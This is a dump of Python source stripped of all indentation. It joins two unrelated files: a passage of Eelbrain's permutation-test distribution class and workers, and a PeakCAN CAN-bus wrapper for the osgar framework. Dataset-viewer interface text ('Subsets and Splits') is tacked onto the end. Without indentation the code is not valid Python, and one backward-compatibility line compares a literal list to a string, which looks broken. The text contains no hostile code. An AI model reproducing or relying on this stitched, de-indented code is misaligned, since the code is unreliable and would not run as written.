def __repr__(self):
items = []
if self.has_original:
dt = timedelta(seconds=round(self.dt_original))
items.append("%i clusters (%s)" % (self.n_clusters, dt))
if self.samples > 0 and self.n_clusters > 0:
if self.dt_perm is not None:
dt = timedelta(seconds=round(self.dt_perm))
items.append("%i permutations (%s)" % (self.samples, dt))
else:
items.append("no data")
return "<NDPermutationDistribution: %s>" % ', '.join(items)
def __getstate__(self):
if not self._finalized:
raise RuntimeError("Cannot pickle cluster distribution before all "
"permutations have been added.")
state = {
name: getattr(self, name) for name in (
'name', 'meas', '_version', '_host', '_init_time',
# settings ...
'kind', 'threshold', 'tfce', 'tail', 'criteria', 'samples', 'tstart', 'tstop', 'parc',
# data properties ...
'dims', 'shape', '_nad_ax', '_vector_ax', '_criteria', '_connectivity',
# results ...
'dt_original', 'dt_perm', 'n_clusters', '_dist_dims', 'dist', '_original_param_map', '_original_cluster_map', '_cids',
)}
state['version'] = 3
return state
def __setstate__(self, state):
# backwards compatibility
version = state.pop('version', 0)
if version == 0:
if '_connectivity_src' in state:
del state['_connectivity_src']
del state['_connectivity_dst']
if '_connectivity' in state:
del state['_connectivity']
if 'N' in state:
state['samples'] = state.pop('N')
if '_version' not in state:
state['_version'] = '< 0.11'
if '_host' not in state:
state['_host'] = 'unknown'
if '_init_time' not in state:
state['_init_time'] = None
if 'parc' not in state:
if state['_dist_dims'] is None:
state['parc'] = None
else:
raise OldVersionError("This pickled file is from a previous version of Eelbrain and is not compatible anymore. Please recompute this test.")
elif isinstance(state['parc'], tuple):
if len(state['parc']) == 0:
state['parc'] = None
elif len(state['parc']) == 1:
state['parc'] = state['parc'][0]
else:
raise OldVersionError("This pickled file is from a previous version of Eelbrain and is not compatible anymore. Please recompute this test.")
nad_ax = state['_nad_ax']
state['dims'] = dims = state['dims'][1:]
state['_connectivity'] = Connectivity(
(dims[nad_ax],) + dims[:nad_ax] + dims[nad_ax + 1:],
state['parc'])
if version < 2:
state['_vector_ax'] = None
if version < 3:
state['tfce'] = ['kind'] == 'tfce'
for k, v in state.items():
setattr(self, k, v)
self.has_original = True
self.finalize()
def _repr_test_args(self, pmin):
"Argument representation for TestResult repr"
args = ['samples=%r' % self.samples]
if pmin is not None:
args.append(f"pmin={pmin!r}")
elif self.kind == 'tfce':
arg = f"tfce={self.tfce!r}"
if self.tfce_warning:
arg = f"{arg} [WARNING: The TFCE step is larger than the largest value in the data]"
args.append(arg)
if self.tstart is not None:
args.append(f"tstart={self.tstart!r}")
if self.tstop is not None:
args.append(f"tstop={self.tstop!r}")
for k, v in self.criteria.items():
args.append(f"{k}={v!r}")
return args
def _repr_clusters(self):
info = []
if self.kind == 'cluster':
if self.n_clusters == 0:
info.append("no clusters")
else:
info.append("%i clusters" % self.n_clusters)
if self.n_clusters and self.samples:
info.append(f"{fmtxt.peq(self.probability_map.min())}")
return info
def _package_ndvar(self, x, info=None, external_shape=False):
"Generate NDVar from map with internal shape"
if not self.dims:
if isinstance(x, np.ndarray):
return x.item()
return x
if not external_shape and self._nad_ax:
x = x.swapaxes(0, self._nad_ax)
if info is None:
info = {}
return NDVar(x, self.dims, info, self.name)
def finalize(self):
"Package results and delete temporary data"
if self.dt_perm is None:
self.dt_perm = current_time() - self._t0
# original parameter map
param_contours = {}
if self.kind == 'cluster':
if self.tail >= 0:
param_contours[self.threshold] = (0.7, 0.7, 0)
if self.tail <= 0:
param_contours[-self.threshold] = (0.7, 0, 0.7)
info = _info.for_stat_map(self.meas, contours=param_contours)
self.parameter_map = self._package_ndvar(self._original_param_map, info)
# TFCE map
if self.kind == 'tfce':
self.tfce_map = self._package_ndvar(self._original_cluster_map)
else:
self.tfce_map = None
# cluster map
if self.kind == 'cluster':
self.cluster_map = self._package_ndvar(self._original_cluster_map)
else:
self.cluster_map = None
self._finalized = True
def data_for_permutation(self, raw=True):
"""Retrieve data flattened for permutation
Parameters
----------
raw : bool
Return a RawArray and a shape tuple instead of a numpy array.
"""
# get data in the right shape
x = self.y_perm.x
if self._vector_ax:
x = np.moveaxis(x, self._vector_ax + 1, 1)
if self._nad_ax is not None:
dst = 1
src = 1 + self._nad_ax
if self._vector_ax is not None:
dst += 1
if self._vector_ax > self._nad_ax:
src += 1
if dst != src:
x = x.swapaxes(dst, src)
# flat y shape
ndims = 1 + (self._vector_ax is not None)
n_flat = 1 if x.ndim == ndims else reduce(operator.mul, x.shape[ndims:])
y_flat_shape = x.shape[:ndims] + (n_flat,)
if not raw:
return x.reshape(y_flat_shape)
n = reduce(operator.mul, y_flat_shape)
ra = RawArray('d', n)
ra[:] = x.ravel() # OPT: don't copy data
return ra, y_flat_shape, x.shape[ndims:]
def _cluster_properties(self, cluster_map, cids):
"""Create a Dataset with cluster properties
Parameters
----------
cluster_map : NDVar
NDVar in which clusters are marked by bearing the same number.
cids : array_like of int
Numbers specifying the clusters (must occur in cluster_map) which
should be analyzed.
Returns
-------
cluster_properties : Dataset
Cluster properties. Which properties are included depends on the
dimensions.
"""
ndim = cluster_map.ndim
n_clusters = len(cids)
# setup compression
compression = []
for ax, dim in enumerate(cluster_map.dims):
extents = np.empty((n_clusters, len(dim)), dtype=np.bool_)
axes = tuple(i for i in range(ndim) if i != ax)
compression.append((ax, dim, axes, extents))
# find extents for all clusters
c_mask = np.empty(cluster_map.shape, np.bool_)
for i, cid in enumerate(cids):
np.equal(cluster_map, cid, c_mask)
for ax, dim, axes, extents in compression:
np.any(c_mask, axes, extents[i])
# prepare Dataset
ds = Dataset()
ds['id'] = Var(cids)
for ax, dim, axes, extents in compression:
properties = dim._cluster_properties(extents)
if properties is not None:
ds.update(properties)
return ds
def cluster(self, cluster_id):
"""Retrieve a specific cluster as NDVar
Parameters
----------
cluster_id : int
Cluster id.
Returns
-------
cluster : NDVar
NDVar of the cluster, 0 outside the cluster.
Notes
-----
Clusters only have stable ids for thresholded cluster distributions.
"""
if self.kind != 'cluster':
raise RuntimeError(
f'Only cluster-based tests have clusters with stable ids, this '
f'is a {self.kind} distribution. Use the .find_clusters() '
f'method instead with maps=True.')
elif cluster_id not in self._cids:
raise ValueError(f'No cluster with id {cluster_id!r}')
out = self.parameter_map * (self.cluster_map == cluster_id)
properties = self._cluster_properties(self.cluster_map, (cluster_id,))
for k in properties:
out.info[k] = properties[0, k]
return out
def clusters(self, pmin=None, maps=True, **sub):
"""Find significant clusters
Parameters
----------
pmin : None | scalar, 1 >= p >= 0
Threshold p-value for clusters (for thresholded cluster tests the
default is 1, for others 0.05).
maps : bool
Include in the output a map of every cluster (can be memory
intensive if there are large statistical maps and/or many
clusters; default True).
[dimname] : index
Limit the data for the distribution.
Returns
-------
ds : Dataset
Dataset with information about the clusters.
"""
if pmin is None:
if self.samples > 0 and self.kind != 'cluster':
pmin = 0.05
elif self.samples == 0:
msg = ("Can not determine p values in distribution without "
"permutations.")
if self.kind == 'cluster':
msg += " Find clusters with pmin=None."
raise RuntimeError(msg)
if sub:
param_map = self.parameter_map.sub(**sub)
else:
param_map = self.parameter_map
if self.kind == 'cluster':
if sub:
cluster_map = self.cluster_map.sub(**sub)
cids = np.setdiff1d(cluster_map.x, [0])
else:
cluster_map = self.cluster_map
cids = np.array(self._cids)
if len(cids):
# measure original clusters
cluster_v = ndimage.sum(param_map.x, cluster_map.x, cids)
# p-values
if self.samples:
# p-values: "the proportion of random partitions that
# resulted in a larger test statistic than the observed
# one" (179)
dist = self._aggregate_dist(**sub)
n_larger = np.sum(dist > np.abs(cluster_v[:, None]), 1)
cluster_p = n_larger / self.samples
# select clusters
if pmin is not None:
idx = cluster_p <= pmin
cids = cids[idx]
cluster_p = cluster_p[idx]
cluster_v = cluster_v[idx]
# p-value corrected across parc
if sub:
dist = self._aggregate_dist()
n_larger = np.sum(dist > np.abs(cluster_v[:, None]), 1)
cluster_p_corr = n_larger / self.samples
else:
cluster_v = cluster_p = cluster_p_corr = []
ds = self._cluster_properties(cluster_map, cids)
ds['v'] = Var(cluster_v)
if self.samples:
ds['p'] = Var(cluster_p)
if sub:
ds['p_parc'] = Var(cluster_p_corr)
threshold = self.threshold
else:
p_map = self.compute_probability_map(**sub)
bin_map = np.less_equal(p_map.x, pmin)
# threshold for maps
if maps:
values = np.abs(param_map.x)[bin_map]
if len(values):
threshold = values.min() / 2
else:
threshold = 1.
# find clusters (reshape to internal shape for labelling)
if self._nad_ax:
bin_map = bin_map.swapaxes(0, self._nad_ax)
if sub:
raise NotImplementedError("sub")
# need to subset connectivity!
c_map, cids = label_clusters_binary(bin_map, self._connectivity)
if self._nad_ax:
c_map = c_map.swapaxes(0, self._nad_ax)
# Dataset with cluster info
cluster_map = NDVar(c_map, p_map.dims, {}, "clusters")
ds = self._cluster_properties(cluster_map, cids)
ds.info['clusters'] = cluster_map
min_pos = ndimage.minimum_position(p_map.x, c_map, cids)
ds['p'] = Var([p_map.x[pos] for pos in min_pos])
if 'p' in ds:
ds['sig'] = star_factor(ds['p'])
# expand clusters
if maps:
shape = (ds.n_cases,) + param_map.shape
c_maps = np.empty(shape, dtype=param_map.x.dtype)
c_mask = np.empty(param_map.shape, dtype=np.bool_)
for i, cid in enumerate(cids):
np.equal(cluster_map.x, cid, c_mask)
np.multiply(param_map.x, c_mask, c_maps[i])
# package ndvar
dims = ('case',) + param_map.dims
param_contours = {}
if self.tail >= 0:
param_contours[threshold] = (0.7, 0.7, 0)
if self.tail <= 0:
param_contours[-threshold] = (0.7, 0, 0.7)
info = _info.for_stat_map(self.meas, contours=param_contours)
info['summary_func'] = np.sum
ds['cluster'] = NDVar(c_maps, dims, info)
else:
ds.info['clusters'] = self.cluster_map
return ds
def find_peaks(self):
"""Find peaks in a TFCE distribution
Returns
-------
ds : Dataset
Dataset with information about the peaks.
"""
if self.kind == 'cluster':
raise RuntimeError("Not a threshold-free distribution")
param_map = self._original_param_map
probability_map = self.probability_map.x
if self._nad_ax:
probability_map = probability_map.swapaxes(0, self._nad_ax)
peaks = find_peaks(self._original_cluster_map, self._connectivity)
peak_map, peak_ids = label_clusters_binary(peaks, self._connectivity)
ds = Dataset()
ds['id'] = Var(peak_ids)
v = ds.add_empty_var('v')
if self.samples:
p = ds.add_empty_var('p')
bin_buff = np.empty(peak_map.shape, np.bool8)
for i, id_ in enumerate(peak_ids):
idx = np.equal(peak_map, id_, bin_buff)
v[i] = param_map[idx][0]
if self.samples:
p[i] = probability_map[idx][0]
return ds
def compute_probability_map(self, **sub):
"""Compute a probability map
Parameters
----------
[dimname] : index
Limit the data for the distribution.
Returns
-------
probability : NDVar
Map of p-values.
"""
if not self.samples:
raise RuntimeError("Can't compute probability without permutations")
if self.kind == 'cluster':
cpmap = np.ones(self.shape)
if self.n_clusters:
cids = self._cids
dist = self._aggregate_dist(**sub)
cluster_map = self._original_cluster_map
param_map = self._original_param_map
# measure clusters
cluster_v = ndimage.sum(param_map, cluster_map, cids)
# p-values: "the proportion of random partitions that resulted
# in a larger test statistic than the observed one" (179)
n_larger = np.sum(dist >= np.abs(cluster_v[:, None]), 1)
cluster_p = n_larger / self.samples
c_mask = np.empty(self.shape, dtype=np.bool8)
for i, cid in enumerate(cids):
np.equal(cluster_map, cid, c_mask)
cpmap[c_mask] = cluster_p[i]
# revert to original shape
if self._nad_ax:
cpmap = cpmap.swapaxes(0, self._nad_ax)
dims = self.dims
else:
if self.kind == 'tfce':
stat_map = self.tfce_map
else:
if self.tail == 0:
stat_map = self.parameter_map.abs()
elif self.tail < 0:
stat_map = -self.parameter_map
else:
stat_map = self.parameter_map
if sub:
stat_map = stat_map.sub(**sub)
dims = stat_map.dims if isinstance(stat_map, NDVar) else None
cpmap = np.zeros(stat_map.shape) if dims else 0.
if self.dist is None: # flat stat-map
cpmap += 1
else:
dist = self._aggregate_dist(**sub)
idx = np.empty(stat_map.shape, dtype=np.bool8)
actual = stat_map.x if self.dims else stat_map
for v in dist:
cpmap += np.greater_equal(v, actual, idx)
cpmap /= self.samples
if dims:
return NDVar(cpmap, dims, _info.for_cluster_pmap(), self.name)
else:
return cpmap
def masked_parameter_map(self, pmin=0.05, name=None, **sub):
"""Parameter map masked by significance
Parameters
----------
pmin : scalar
Threshold p-value for masking (default 0.05). For threshold-based
cluster tests, ``pmin=1`` includes all clusters regardless of their
p-value.
Returns
-------
masked_map : NDVar
NDVar with data from the original parameter map, masked with
p <= pmin.
"""
if not 1 >= pmin > 0:
raise ValueError(f"pmin={pmin}: needs to be between 1 and 0")
if name is None:
name = self.parameter_map.name
if sub:
param_map = self.parameter_map.sub(**sub)
else:
param_map = self.parameter_map
if pmin == 1:
if self.kind != 'cluster':
raise ValueError(f"pmin=1 is only a valid mask for threshold-based cluster tests")
mask = self.cluster_map == 0
else:
probability_map = self.compute_probability_map(**sub)
mask = probability_map > pmin
return param_map.mask(mask, name)
@LazyProperty
def probability_map(self):
if self.samples:
return self.compute_probability_map()
else:
return None
@LazyProperty
def _default_plot_obj(self):
if self.samples:
return [[self.parameter_map, self.probability_map]]
else:
return [[self.parameter_map]]
def info_list(self, title="Computation Info"):
"List with information on computation"
l = fmtxt.List(title)
l.add_item("Eelbrain version: %s" % self._version)
l.add_item("Host Computer: %s" % self._host)
if self._init_time is not None:
l.add_item("Created: %s" % datetime.fromtimestamp(self._init_time)
.strftime('%y-%m-%d %H:%M'))
l.add_item("Original time: %s" % timedelta(seconds=round(self.dt_original)))
l.add_item("Permutation time: %s" % timedelta(seconds=round(self.dt_perm)))
return l
class _MergedTemporalClusterDist:
"""Merge permutation distributions from multiple tests"""
def __init__(self, cdists):
if isinstance(cdists[0], list):
self.effects = [d.name for d in cdists[0]]
self.samples = cdists[0][0].samples
dist = {}
for i, effect in enumerate(self.effects):
if any(d[i].n_clusters for d in cdists):
dist[effect] = np.column_stack([d[i].dist for d in cdists if d[i].dist is not None])
if len(dist):
dist = {c: d.max(1) for c, d in dist.items()}
else:
self.samples = cdists[0].samples
if any(d.n_clusters for d in cdists):
dist = np.column_stack([d.dist for d in cdists if d.dist is not None])
dist = dist.max(1)
else:
dist = None
self.dist = dist
def correct_cluster_p(self, res):
clusters = res.find_clusters()
keys = list(clusters.keys())
if not clusters.n_cases:
return clusters
if isinstance(res, MultiEffectNDTest):
keys.insert(-1, 'p_parc')
cluster_p_corr = []
for cl in clusters.itercases():
n_larger = np.sum(self.dist[cl['effect']] > np.abs(cl['v']))
cluster_p_corr.append(float(n_larger) / self.samples)
else:
keys.append('p_parc')
vs = np.array(clusters['v'])
n_larger = np.sum(self.dist > np.abs(vs[:, None]), 1)
cluster_p_corr = n_larger / self.samples
clusters['p_parc'] = Var(cluster_p_corr)
clusters = clusters[keys]
return clusters
def distribution_worker(dist_array, dist_shape, in_queue, kill_beacon):
"Worker that accumulates values and places them into the distribution"
n = reduce(operator.mul, dist_shape)
dist = np.frombuffer(dist_array, np.float64, n)
dist.shape = dist_shape
samples = dist_shape[0]
for i in trange(samples, desc="Permutation test", unit=' permutations',
disable=CONFIG['tqdm']):
dist[i] = in_queue.get()
if kill_beacon.is_set():
return
def permutation_worker(in_queue, out_queue, y, y_flat_shape, stat_map_shape,
test_func, args, map_args, kill_beacon):
"Worker for 1 sample t-test"
if CONFIG['nice']:
os.nice(CONFIG['nice'])
n = reduce(operator.mul, y_flat_shape)
y = np.frombuffer(y, np.float64, n).reshape(y_flat_shape)
stat_map = np.empty(stat_map_shape)
stat_map_flat = stat_map.ravel()
map_processor = get_map_processor(*map_args)
while not kill_beacon.is_set():
perm = in_queue.get()
if perm is None:
break
test_func(y, *args, stat_map_flat, perm)
max_v = map_processor.max_stat(stat_map)
out_queue.put(max_v)
def run_permutation(test_func, dist, iterator, *args):
if CONFIG['n_workers']:
workers, out_queue, kill_beacon = setup_workers(test_func, dist, args)
try:
for perm in iterator:
out_queue.put(perm)
for _ in range(len(workers) - 1):
out_queue.put(None)
logger = logging.getLogger(__name__)
for w in workers:
w.join()
logger.debug("worker joined")
except KeyboardInterrupt:
kill_beacon.set()
raise
else:
y = dist.data_for_permutation(False)
map_processor = get_map_processor(*dist.map_args)
stat_map = np.empty(dist.shape)
stat_map_flat = stat_map.ravel()
for i, perm in enumerate(iterator):
test_func(y, *args, stat_map_flat, perm)
dist.dist[i] = map_processor.max_stat(stat_map)
dist.finalize()
def setup_workers(test_func, dist, func_args):
"Initialize workers for permutation tests"
logger = logging.getLogger(__name__)
logger.debug("Setting up %i worker processes..." % CONFIG['n_workers'])
permutation_queue = SimpleQueue()
dist_queue = SimpleQueue()
kill_beacon = Event()
restore_main_spec()
# permutation workers
y, y_flat_shape, stat_map_shape = dist.data_for_permutation()
args = (permutation_queue, dist_queue, y, y_flat_shape, stat_map_shape,
test_func, func_args, dist.map_args, kill_beacon)
workers = []
for _ in range(CONFIG['n_workers']):
w = Process(target=permutation_worker, args=args)
w.start()
workers.append(w)
# distribution worker
args = (dist.dist_array, dist.dist_shape, dist_queue, kill_beacon)
w = Process(target=distribution_worker, args=args)
w.start()
workers.append(w)
return workers, permutation_queue, kill_beacon
def run_permutation_me(test, dists, iterator):
dist = dists[0]
if dist.kind == 'cluster':
thresholds = tuple(d.threshold for d in dists)
else:
thresholds = None
if CONFIG['n_workers']:
workers, out_queue, kill_beacon = setup_workers_me(test, dists, thresholds)
try:
for perm in iterator:
out_queue.put(perm)
for _ in range(len(workers) - 1):
out_queue.put(None)
logger = logging.getLogger(__name__)
for w in workers:
w.join()
logger.debug("worker joined")
except KeyboardInterrupt:
kill_beacon.set()
raise
else:
y = dist.data_for_permutation(False)
map_processor = get_map_processor(*dist.map_args)
stat_maps = test.preallocate(dist.shape)
if thresholds:
stat_maps_iter = tuple(zip(stat_maps, thresholds, dists))
else:
stat_maps_iter = tuple(zip(stat_maps, dists))
for i, perm in enumerate(iterator):
test.map(y, perm)
if thresholds:
for m, t, d in stat_maps_iter:
if d.do_permutation:
d.dist[i] = map_processor.max_stat(m, t)
else:
for m, d in stat_maps_iter:
if d.do_permutation:
d.dist[i] = map_processor.max_stat(m)
for d in dists:
if d.do_permutation:
d.finalize()
def setup_workers_me(test_func, dists, thresholds):
"Initialize workers for permutation tests"
logger = logging.getLogger(__name__)
logger.debug("Setting up %i worker processes..." % CONFIG['n_workers'])
permutation_queue = SimpleQueue()
dist_queue = SimpleQueue()
kill_beacon = Event()
restore_main_spec()
# permutation workers
dist = dists[0]
y, y_flat_shape, stat_map_shape = dist.data_for_permutation()
args = (permutation_queue, dist_queue, y, y_flat_shape, stat_map_shape,
test_func, dist.map_args, thresholds, kill_beacon)
workers = []
for _ in range(CONFIG['n_workers']):
w = Process(target=permutation_worker_me, args=args)
w.start()
workers.append(w)
# distribution worker
args = ([d.dist_array for d in dists], dist.dist_shape, dist_queue, kill_beacon)
w = Process(target=distribution_worker_me, args=args)
w.start()
workers.append(w)
return workers, permutation_queue, kill_beacon
def permutation_worker_me(in_queue, out_queue, y, y_flat_shape, stat_map_shape,
test, map_args, thresholds, kill_beacon):
if CONFIG['nice']:
os.nice(CONFIG['nice'])
n = reduce(operator.mul, y_flat_shape)
y = np.frombuffer(y, np.float64, n).reshape(y_flat_shape)
iterator = test.preallocate(stat_map_shape)
if thresholds:
iterator = tuple(zip(iterator, thresholds))
else:
iterator = tuple(iterator)
map_processor = get_map_processor(*map_args)
while not kill_beacon.is_set():
perm = in_queue.get()
if perm is None:
break
test.map(y, perm)
if thresholds:
max_v = [map_processor.max_stat(m, t) for m, t in iterator]
else:
max_v = [map_processor.max_stat(m) for m in iterator]
out_queue.put(max_v)
def distribution_worker_me(dist_arrays, dist_shape, in_queue, kill_beacon):
"Worker that accumulates values and places them into the distribution"
n = reduce(operator.mul, dist_shape)
dists = [d if d is None else np.frombuffer(d, np.float64, n).reshape(dist_shape)
for d in dist_arrays]
samples = dist_shape[0]
for i in trange(samples, desc="Permutation test", unit=' permutations',
disable=CONFIG['tqdm']):
for dist, v in zip(dists, in_queue.get()):
if dist is not None:
dist[i] = v
if kill_beacon.is_set():
return
# Backwards compatibility for pickling
_ClusterDist = NDPermutationDistribution
|
pcan.py
|
"""
Wrapper for PeakCAN USB device
"""
#
# pip install python-can
# https://python-can.readthedocs.io/en/2.1.0/interfaces/pcan.html
#
# https://www.peak-system.com/
# https://www.peak-system.com/fileadmin/media/files/pcan-basic.zip
# http://www.peak-system.com/quick/BasicLinux
#
# https://en.wikipedia.org/wiki/CAN_bus
#
# The new CAN messages will contain arbitration_id, data and flags
# http://docs.ros.org/melodic/api/can_msgs/html/msg/Frame.html
#
import can
from threading import Thread
from osgar.bus import BusShutdownException
IS_EXTENDED_ID_MASK = 0x1
class PeakCAN:
def __init__(self, config, bus):
self.bus = bus
bus.register('can')
self.canbus = can.interface.Bus(bustype='pcan', channel='PCAN_USBBUS1', bitrate=500000)
self.input_thread = Thread(target=self.run_input, daemon=True)
self.output_thread = Thread(target=self.run_output, daemon=True)
def start(self):
self.input_thread.start()
self.output_thread.start()
def join(self, timeout=None):
self.input_thread.join(timeout=timeout)
self.output_thread.join(timeout=timeout)
def run_input(self):
while self.bus.is_alive():
msg = self.canbus.recv() # TODO timeout
flags = IS_EXTENDED_ID_MASK if msg.is_extended_id else 0
self.bus.publish('can', [msg.arbitration_id, msg.data, flags])
def slot_raw(self, timestamp, packet):
arbitration_id, data, flags = packet
msg = can.Message(arbitration_id=arbitration_id, data=data, is_extended_id=(flags & IS_EXTENDED_ID_MASK))
self.canbus.send(msg) # TODO timeout, locks?!
def run_output(self):
try:
while True:
dt, __, data = self.bus.listen()
self.slot_raw(dt, data)
except BusShutdownException:
pass
def request_stop(self):
self.bus.shutdown()
# vim: expandtab sw=4 ts=4
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.